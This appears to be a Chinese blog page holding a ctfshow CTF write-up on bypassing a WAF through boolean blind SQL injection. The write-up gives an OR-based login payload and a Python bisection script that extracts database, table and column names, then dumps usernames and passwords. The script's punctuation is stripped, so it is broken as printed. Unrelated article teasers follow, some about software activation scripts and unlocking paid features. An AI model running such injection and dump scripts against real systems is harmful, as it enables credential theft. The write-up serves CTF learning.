ctfshow——web WAF绕过
📅 2026/7/7 18:48:24
👁️ 次浏览
WAF绕过 wp进入页面一个登入框经过测试没有弱口令爆破抓包测试发现存在布尔盲注逻辑为真时逻辑为假时构造payloaduserNameadminpassWord1or(ascii(substr((select(database())),1,1))100)#脚本如下二分法#-*-coding:utf-8-*- import requests import time host http://e3599346-f189-47c3-9e85-1d7ff4fee612.challenge.ctf.show/login.php def getDatabase(): #获取数据库名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: usernameadmin password1or(ascii(substr((select(database())),%d,1))%d)# % (i,mid) param {userName:username,passWord:password} res requests.post(host,dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(database is - ans) def getTable(): #获取表名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)database()),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(table is - ans) def getColumn(): #获取列名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)\users\),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(column is - ans) def dumpTable():#脱裤 global host ans for i in range(1,10000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(username,0x3a,password))from(users)),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(dumpTable is - ans) dumpTable()运行结果flagCTF{bool_sql_injection_bypass_is_fun}
影刀RPA Excel单元格读写:精确定位与批量操作
作者:林焱 Excel操作是影刀RPA最核心的能力之一。大部分自动化流程都涉及Excel数据的读取或写入——读取配置表、写入采集结果、更新数据状态、生成报表。但很多新手在操作Excel时效率很低:逐个…
📅 2026/7/7 18:48:24
27 MCP服务器配置与调试指南——从入门到排坑
一、前言
在上篇文章中,我们了解了MCP协议的原理。现在,是时候动手了!本文将带你全面掌握在Codex中配置和管理MCP Server的每一个细节——从命令行的每一个参数,到常见错误的排查方法。
无论你是第一次配置MCP Server的新手…
📅 2026/7/7 18:48:24
正文2026 年日常修图、证件照制作、自媒体海报、电商人像素材处理,都离不开人像抠图操作。不同使用场景、设备对应的工具在精度、免费权限、操作门槛上差异明显,本文按照电脑专业软件、手机端 APP、在线网页工具、微信小程序四大类整理可用方案ÿ…
📅 2026/7/7 18:48:24
1. 项目概述:为什么说Wireshark是网络工程师的“瑞士军刀”?如果你在网络运维、安全分析或者软件开发领域摸爬滚打过,那么“抓包”这个词对你来说一定不陌生。当网络突然变慢、应用连接异常、或者怀疑有可疑流量时,我们第一时间想…
📅 2026/7/7 19:56:37
KMS智能激活终极指南:从原理到实践的全栈技术解析 【免费下载链接】KMS_VL_ALL_AIO Smart Activation Script 项目地址: https://gitcode.com/gh_mirrors/km/KMS_VL_ALL_AIO
KMS_VL_ALL_AIO是一款基于KMS协议的开源智能激活脚本工具,支持Windows …
📅 2026/7/7 19:56:37
1. 项目概述:为什么是 Playwright?如果你正在寻找一个能让你用 Python 代码“驯服”现代浏览器的工具,那么 Playwright 很可能就是你绕不开的最终选择。我最初接触浏览器自动化是从 Selenium 开始的,后来也折腾过 Pyppeteer&#…
📅 2026/7/7 19:56:37
1. 项目概述与核心挑战最近在整合一个老系统和新服务的项目,一边是十几年前用Delphi 7写的桌面客户端,另一边是跑在云上的Spring Boot微服务。两边需要交换一些用户凭证和配置信息,安全起见,肯定得加密。DES算法虽然现在看有点“老…
📅 2026/7/7 19:56:37
1. 项目概述:MAX11108A与STM32L452RE的ADC信号转换系统在工业测量、医疗设备和消费电子产品中,模拟信号到数字信号的转换(ADC)是连接物理世界与数字系统的关键桥梁。MAX11108A作为一款高精度、低功耗的16位ADC芯片,配合…
📅 2026/7/7 19:56:37
5个步骤轻松解锁Wand游戏修改器的完整高级功能 【免费下载链接】Wand-Enhancer Advanced UX and interoperability extension for Wand (WeMod) app 项目地址: https://gitcode.com/gh_mirrors/we/Wand-Enhancer
还在为游戏修改器的高级功能需要付费而烦恼吗?…
📅 2026/7/7 19:54:35
CentOS SSH连接故障排查:从基础检查到深度修复的完整指南引言当你尝试通过Xshell或其他SSH客户端连接CentOS服务器时,突然遭遇"Connection refused"或"Connection timed out"的错误提示,这种经历对任何运维人员或开发者来…
📅 2026/7/7 0:00:45
B站评论删除API逆向工程实战:关键参数解析与自动化操作指南1. 理解B站评论删除机制的核心逻辑在视频平台内容管理中,评论删除功能涉及复杂的权限验证和数据交互流程。B站的评论删除API采用了一套基于Web安全标准的防护机制,主要依赖三个关键参…
📅 2026/7/7 0:00:45
1. 项目概述:为什么Java安全是红蓝对抗的焦点在当前的网络安全攻防演练,也就是我们常说的红蓝对抗中,Java应用一直是双方交锋的核心战场。这不仅仅是因为Java在企业级应用、金融系统和大型互联网后台中无处不在,更因为其技术栈的复…
📅 2026/7/7 0:00:45
1. 项目背景与核心需求 在嵌入式系统开发中,快速精确的数据检索是一个常见但极具挑战性的需求。特别是在工业控制、医疗设备和物联网终端等场景下,系统往往需要在毫秒级时间内完成关键参数的读取和写入操作。传统基于Flash存储的方案存在擦写次数有限、操…
📅 2026/7/7 12:08:23
1. 工业电流环信号传输的基础认知在工业自动化领域,4-20mA电流环传输技术已经持续服役超过半个世纪。这种看似简单的信号传输方式之所以能经久不衰,核心在于其独特的抗干扰能力——电流信号在长距离传输时几乎不受线路电阻和电压波动的影响。我曾在化工厂…
📅 2026/7/7 9:08:28
最近在项目里尝试用 YOLO 做目标检测,从环境搭建到模型训练,再到推理部署,整个过程踩了不少坑。网上的资料虽然多,但要么版本老旧,要么步骤零散不成体系,对于刚入门的新手来说,很容易卡在某个环…
📅 2026/7/7 6:33:36
目录
第一步:选对模板,省心一半
第二步:打开扫码点餐功能
开启功能按钮
桌台管理与桌码生成
第三步:个性化设计,打造品牌感
调整点餐页面
设置点餐规则 你还在让顾客站着排队点餐吗?2025年ÿ…
📅 2026/7/7 9:08:31
在业务中快速构建一个能理解私有文档、准确回答专业问题的智能助手,是很多开发团队面临的共同挑战。传统方案往往需要从零开始搭建复杂的 RAG(检索增强生成)系统,涉及文档解析、向量化、检索、大模型调用等多个环节,整…
📅 2026/7/7 9:08:30
FAE放射组学分析工具:医学影像特征探索的完整解决方案 【免费下载链接】FAE FeAture Explorer 项目地址: https://gitcode.com/gh_mirrors/fae/FAE
你是否曾经面对海量医学影像数据感到无从下手?想要从CT、MRI等影像中提取有价值的定量特征&#…
📅 2026/7/7 4:32:18